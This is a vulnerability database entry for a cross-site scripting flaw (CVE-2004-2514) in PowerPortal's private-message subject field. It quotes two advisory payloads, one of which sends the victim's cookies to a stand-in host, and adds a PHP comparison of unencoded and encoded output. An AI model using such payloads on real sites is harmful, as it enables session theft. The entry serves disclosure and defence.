PowerPortal Private Message HTML Injection Vulnerability

Vulnerability ID: 1108093    Vulnerability type: Cross-site scripting
Published: 2004-07-30    Updated: 2006-01-24
CVE ID: CVE-2004-2514    CNNVD-ID: CNNVD-200412-554
Platform: PHP    CVSS score: 4.3
|Vulnerability Source
https://www.exploit-db.com/exploits/24340
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-554
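|Vulnerability Details
A cross-site scripting (XSS) vulnerability exists in modules/private_messages/index.php in PowerPortal 1.x. Remote attackers can inject arbitrary web script or HTML via the (1) SUBJECT or (2) MESSAGE field.
|Vulnerability EXP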
source: http://www.securityfocus.com/bid/10835/info

A vulnerability is reported for PowerPortal which may make it prone to HTML injection attacks. The problem is said to occur due to a lack of sufficient sanitization performed on private message data.

Specifically, when creating PowerPortal private messages, the subject field may not be sufficiently sanitized of malicious content. This may make it possible for an attacker to place HTML or script code within the subject field of a private PowerPortal message for another user.

Subject: <script>alert(document.cookie);</script>
Subject: <script>document.location='http://www.example.com/?'+document.cookie</script>
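
As an added illustration (not PowerPortal's code and not part of the SecurityFocus text), the PHP below contrasts writing the subject and message fields into the page unencoded with encoding them at output time. The function names, array keys and markup are assumptions, and the sample message is constructed.

```php
<?php
// Added example. Hypothetical helpers; not taken from PowerPortal.

// Before: fields are concatenated into the page as-is, so markup in the
// subject or message is parsed by the recipient's browser.
function render_pm_unencoded(array $pm): string
{
    return '<h3>' . $pm['subject'] . '</h3><p>' . $pm['message'] . '</p>';
}

// Encode untrusted text for an HTML element body or quoted attribute value.
function h(string $s): string
{
    // ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE keeps malformed
    // UTF-8 from turning the whole string into an empty one.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// After: every user-controlled field is encoded at output time.
function render_pm_encoded(array $pm): string
{
    // nl2br runs after encoding, so the only tags emitted are its own <br />.
    return '<h3>' . h($pm['subject']) . '</h3>'
         . '<p>' . nl2br(h($pm['message'])) . '</p>';
}

// Constructed sample message; the subject is the first value quoted above.
$pm = [
    'subject' => '<script>alert(document.cookie);</script>',
    'message' => "Hello,\n<b>see you at 5</b>",
];

// Print both forms as plain text for comparison (command line only).
if (PHP_SAPI === 'cli') {
    echo "unencoded: ", render_pm_unencoded($pm), "\n";
    echo "encoded:   ", render_pm_encoded($pm), "\n";
}
```

Marking the session cookie HttpOnly and serving a Content-Security-Policy that disallows inline script limit the impact if an encoding call is ever missed.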
|References

Source: XF
Name: powerportal-private-message-xss(16838)
Link: http://xforce.iss.net/xforce/xfdb/16838
Source: BID
Name: 10835
Link: http://www.securityfocus.com/bid/10835
Source: www.securiteam.com
Link: http://www.securiteam.com/unixfocus/5TP0O2ADFK.html
Source: OSVDB
Name: 8319
Link: http://www.osvdb.org/8319
Source: SECTRACK
Name: 1010802
Link: http://securitytracker.com/id?1010802